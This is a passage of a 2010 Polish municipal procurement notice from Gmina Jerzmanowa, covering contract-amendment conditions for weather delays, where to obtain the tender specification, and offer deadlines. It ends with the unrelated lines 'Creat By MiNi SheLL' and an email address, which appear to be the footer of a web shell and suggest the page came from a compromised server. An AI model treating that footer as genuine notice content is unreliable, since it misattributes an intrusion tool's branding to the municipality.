<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadku wystąpienia w trakcie realizacji zadania niesprzyjających warunków atmosferycznych  - intensywne opady deszczu utrzymujące się nieprzerwanie przez okres minimum 7 dni uniemożliwiające terminowe zakończenie realizacji inwestycji, termin wykonania zadania może być przedmiotem uzgodnień pomiędzy Zamawiającym, a Wykonawcą. Wykonawca winien udokumentować zaistniałe przyczyny potwierdzone przez stację meteorologiczną.
2. W przypadku wystąpienia przyczyn, o których mowa wyżej strony uzgadniają nowe terminy realizacji przedmiotu niniejszej umowy w formie aneksu, jednak termin przedłużenia realizacji umowy nie może być dłuższy niż liczba dni, przez które trwały nieprzerwanie wymienione powyżej przyczyny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jerzmanowa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jerzmanowa
ul. Głogowska 7
67-222 Jerzmanowa
pokój nr 7-Referat budwnictwa i zarządu dróg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2010 godzina 08:30, miejsce: Urząd Gminy Jerzmanowa
ul. Głogowska 7
67-222 Jerzmanowa
sekretariat, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com